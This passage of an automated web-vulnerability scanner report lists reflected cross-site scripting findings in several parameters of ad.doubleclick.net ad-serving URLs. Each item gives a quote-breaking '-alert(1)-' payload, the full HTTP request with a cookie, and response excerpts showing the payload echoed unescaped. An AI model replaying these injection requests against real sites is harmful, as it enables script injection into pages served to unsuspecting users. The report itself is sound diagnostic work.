...[SNIP]...

4.86. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [mid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4406.Valueclick/B5146746.7

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload faa55'-alert(1)-'c93eebcb7dc was submitted in the mid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4406.Valueclick/B5146746.7;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=256292&mid=520391faa55'-alert(1)-'c93eebcb7dc&m=6&sid=54393&c=0&tp=8&forced_click=;ord=20110129011946?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6003
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:17 GMT
Expires: Sat, 29 Jan 2011 05:20:17 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
//ad.doubleclick.net/click%3Bh%3Dv8/3a9e/f/7e/%2a/i%3B235159500%3B0-0%3B0%3B59006743%3B4307-300/250%3B40327689/40345476/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=256292&mid=520391faa55'-alert(1)-'c93eebcb7dc&m=6&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi\">
...[SNIP]...

4.87. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [mid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4406.Valueclick/B5146746.7

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5e2f"-alert(1)-"29247c7cc7e was submitted in the mid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4406.Valueclick/B5146746.7;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=256292&mid=520391f5e2f"-alert(1)-"29247c7cc7e&m=6&sid=54393&c=0&tp=8&forced_click=;ord=20110129011946?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6003
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:16 GMT
Expires: Sat, 29 Jan 2011 05:20:16 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
//ad.doubleclick.net/click%3Bh%3Dv8/3a9e/f/7e/%2a/i%3B235159500%3B0-0%3B0%3B59006743%3B4307-300/250%3B40327689/40345476/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=256292&mid=520391f5e2f"-alert(1)-"29247c7cc7e&m=6&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi");
var fscUrl = url;
var fscUrlClickTa
...[SNIP]...

4.88. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [sid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4406.Valueclick/B5146746.7

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b627"-alert(1)-"f37e95824ee was submitted in the sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4406.Valueclick/B5146746.7;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=543933b627"-alert(1)-"f37e95824ee&c=0&tp=8&forced_click=;ord=20110129011946?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6003
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:21 GMT
Expires: Sat, 29 Jan 2011 05:20:21 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ck.net/click%3Bh%3Dv8/3a9e/f/7e/%2a/i%3B235159500%3B0-0%3B0%3B59006743%3B4307-300/250%3B40327689/40345476/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=543933b627"-alert(1)-"f37e95824ee&c=0&tp=8&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi");
var fscUrl = url;
var fscUrlClickTagFound = false
...[SNIP]...

4.89. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [sid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4406.Valueclick/B5146746.7

Issue detail

The value of the sid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f838'-alert(1)-'0c67bb9771d was submitted in the sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4406.Valueclick/B5146746.7;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=543937f838'-alert(1)-'0c67bb9771d&c=0&tp=8&forced_click=;ord=20110129011946?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6003
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:22 GMT
Expires: Sat, 29 Jan 2011 05:20:22 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ck.net/click%3Bh%3Dv8/3a9e/f/7e/%2a/i%3B235159500%3B0-0%3B0%3B59006743%3B4307-300/250%3B40327689/40345476/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=543937f838'-alert(1)-'0c67bb9771d&c=0&tp=8&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi\">
...[SNIP]...

4.90. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4406.Valueclick/B5146746.7

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4af20'-alert(1)-'1a377f66add was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4406.Valueclick/B5146746.7;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=2562924af20'-alert(1)-'1a377f66add&mid=520391&m=6&sid=54393&c=0&tp=8&forced_click=;ord=20110129011946?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6003
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:15 GMT
Expires: Sat, 29 Jan 2011 05:20:15 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ref=\"http://ad.doubleclick.net/click%3Bh%3Dv8/3a9e/f/7e/%2a/i%3B235159500%3B0-0%3B0%3B59006743%3B4307-300/250%3B40327689/40345476/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=2562924af20'-alert(1)-'1a377f66add&mid=520391&m=6&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi\">
...[SNIP]...

4.91. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4406.Valueclick/B5146746.7

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 965de"-alert(1)-"48eda9b2c46 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4406.Valueclick/B5146746.7;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=256292965de"-alert(1)-"48eda9b2c46&mid=520391&m=6&sid=54393&c=0&tp=8&forced_click=;ord=20110129011946?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6003
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:14 GMT
Expires: Sat, 29 Jan 2011 05:20:14 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
cape("http://ad.doubleclick.net/click%3Bh%3Dv8/3a9e/f/7e/%2a/i%3B235159500%3B0-0%3B0%3B59006743%3B4307-300/250%3B40327689/40345476/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=256292965de"-alert(1)-"48eda9b2c46&mid=520391&m=6&sid=54393&c=0&tp=8&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi");
var fscUrl = url;
var fs
...[SNIP]...

4.92. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [tp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4406.Valueclick/B5146746.7

Issue detail

The value of the tp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45bab'-alert(1)-'48cd638711e was submitted in the tp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4406.Valueclick/B5146746.7;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=54393&c=0&tp=845bab'-alert(1)-'48cd638711e&forced_click=;ord=20110129011946?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6003
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:25 GMT
Expires: Sat, 29 Jan 2011 05:20:25 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ick%3Bh%3Dv8/3a9e/f/7e/%2a/i%3B235159500%3B0-0%3B0%3B59006743%3B4307-300/250%3B40327689/40345476/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=54393&c=0&tp=845bab'-alert(1)-'48cd638711e&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi\">
...[SNIP]...

4.93. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [tp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4406.Valueclick/B5146746.7

Issue detail

The value of the tp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97619"-alert(1)-"aee72703284 was submitted in the tp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4406.Valueclick/B5146746.7;sz=300x250;click=http://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=54393&c=0&tp=897619"-alert(1)-"aee72703284&forced_click=;ord=20110129011946?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6003
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:24 GMT
Expires: Sat, 29 Jan 2011 05:20:24 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
ick%3Bh%3Dv8/3a9e/f/7e/%2a/i%3B235159500%3B0-0%3B0%3B59006743%3B4307-300/250%3B40327689/40345476/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=256292&mid=520391&m=6&sid=54393&c=0&tp=897619"-alert(1)-"aee72703284&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wm
...[SNIP]...

4.94. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4406.Valueclick/B5146746.8

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 159c7'-alert(1)-'21f1ab1a58 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4406.Valueclick/B5146746.8;sz=728x90;click=http://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=54393&c=0159c7'-alert(1)-'21f1ab1a58&tp=5&forced_click=;ord=20110128233308?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5990
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:24 GMT
Expires: Sat, 29 Jan 2011 05:20:24 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
net/click%3Bh%3Dv8/3a9e/f/7d/%2a/k%3B235159493%3B0-0%3B0%3B59006746%3B3454-728/90%3B40327690/40345477/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=54393&c=0159c7'-alert(1)-'21f1ab1a58&tp=5&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi\">
...[SNIP]...

4.95. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4406.Valueclick/B5146746.8

Issue detail

The value of the c request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc101"-alert(1)-"4c6cf87a680 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4406.Valueclick/B5146746.8;sz=728x90;click=http://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=54393&c=0dc101"-alert(1)-"4c6cf87a680&tp=5&forced_click=;ord=20110128233308?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5994
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:23 GMT
Expires: Sat, 29 Jan 2011 05:20:23 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
net/click%3Bh%3Dv8/3a9e/f/7e/%2a/k%3B235159493%3B0-0%3B0%3B59006746%3B3454-728/90%3B40327690/40345477/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=54393&c=0dc101"-alert(1)-"4c6cf87a680&tp=5&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi");
var fscUrl = url;
var fscUrlClickTagFound = false;
v
...[SNIP]...

4.96. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [forced_click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4406.Valueclick/B5146746.8

Issue detail

The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7bef7"-alert(1)-"8089e6c04bf was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4406.Valueclick/B5146746.8;sz=728x90;click=http://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=54393&c=0&tp=5&forced_click=7bef7"-alert(1)-"8089e6c04bf HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5952
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:28 GMT
Expires: Sat, 29 Jan 2011 05:20:28 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
3a9e/7/7e/%2a/k%3B235159493%3B0-0%3B0%3B59006746%3B3454-728/90%3B40327690/40345477/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=54393&c=0&tp=5&forced_click=7bef7"-alert(1)-"8089e6c04bfhttp://www.marriott.com/setSCtracking.mi?scid=2011118D1878000004&mid=/marriott/hotels-resorts/weekendbonus.mi");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = ""
...[SNIP]...

4.97. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [forced_click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4406.Valueclick/B5146746.8

Issue detail

The value of the forced_click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7ea6'-alert(1)-'1fafd552781 was submitted in the forced_click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4406.Valueclick/B5146746.8;sz=728x90;click=http://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=54393&c=0&tp=5&forced_click=d7ea6'-alert(1)-'1fafd552781 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5952
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:29 GMT
Expires: Sat, 29 Jan 2011 05:20:29 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
3a9e/7/7e/%2a/k%3B235159493%3B0-0%3B0%3B59006746%3B3454-728/90%3B40327690/40345477/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1&sid=54393&c=0&tp=5&forced_click=d7ea6'-alert(1)-'1fafd552781http://www.marriott.com/setSCtracking.mi?scid=2011118D1878000004&mid=/marriott/hotels-resorts/weekendbonus.mi\">
...[SNIP]...

4.98. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [m parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4406.Valueclick/B5146746.8

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0271'-alert(1)-'62af3c29b54 was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4406.Valueclick/B5146746.8;sz=728x90;click=http://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1b0271'-alert(1)-'62af3c29b54&sid=54393&c=0&tp=5&forced_click=;ord=20110128233308?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5994
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:21 GMT
Expires: Sat, 29 Jan 2011 05:20:21 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
d.doubleclick.net/click%3Bh%3Dv8/3a9e/f/7e/%2a/k%3B235159493%3B0-0%3B0%3B59006746%3B3454-728/90%3B40327690/40345477/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1b0271'-alert(1)-'62af3c29b54&sid=54393&c=0&tp=5&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi\">
...[SNIP]...

4.99. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [m parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4406.Valueclick/B5146746.8

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1cc5"-alert(1)-"e78fc2ba4dd was submitted in the m parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4406.Valueclick/B5146746.8;sz=728x90;click=http://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1c1cc5"-alert(1)-"e78fc2ba4dd&sid=54393&c=0&tp=5&forced_click=;ord=20110128233308?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5994
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:21 GMT
Expires: Sat, 29 Jan 2011 05:20:21 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
d.doubleclick.net/click%3Bh%3Dv8/3a9e/f/7e/%2a/k%3B235159493%3B0-0%3B0%3B59006746%3B3454-728/90%3B40327690/40345477/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279903&mid=522236&m=1c1cc5"-alert(1)-"e78fc2ba4dd&sid=54393&c=0&tp=5&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi");
var fscUrl = url;
var fscUrlClickTagFou
...[SNIP]...

4.100. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [mid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4406.Valueclick/B5146746.8

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b608"-alert(1)-"043dce3e05a was submitted in the mid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4406.Valueclick/B5146746.8;sz=728x90;click=http://media.fastclick.net/w/click.here?cid=279903&mid=5222361b608"-alert(1)-"043dce3e05a&m=1&sid=54393&c=0&tp=5&forced_click=;ord=20110128233308?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5994
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:18 GMT
Expires: Sat, 29 Jan 2011 05:20:18 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
://ad.doubleclick.net/click%3Bh%3Dv8/3a9e/f/7e/%2a/k%3B235159493%3B0-0%3B0%3B59006746%3B3454-728/90%3B40327690/40345477/1%3B%3B%7Esscs%3D%3fhttp://media.fastclick.net/w/click.here?cid=279903&mid=5222361b608"-alert(1)-"043dce3e05a&m=1&sid=54393&c=0&tp=5&forced_click=http%3a%2f%2fwww.marriott.com/setSCtracking.mi%3Fscid%3D2011118D1878000004%26mid%3D/marriott/hotels-resorts/weekendbonus.mi");
var fscUrl = url;
var fscUrlClickTa
...[SNIP]...

4.101. http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [mid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4406.Valueclick/B5146746.8

Issue detail

The value of the mid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0165'-alert(1)-'634ccbdbc03 was submitted in the mid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4406.Valueclick/B5146746.8;sz=728x90;click=http://media.fastclick.net/w/click.here?cid=279903&mid=522236f0165'-alert(1)-'634ccbdbc03&m=1&sid=54393&c=0&tp=5&forced_click=;ord=20110128233308?\ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5994
Cache-Control: no-cache
Pragma: no-cache
Date: Sat, 29 Jan 2011 05:20:19 GMT
Expires: Sat, 29 Jan 2011 05:20:19 GMT
Connection: close

document.write('\r\n\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
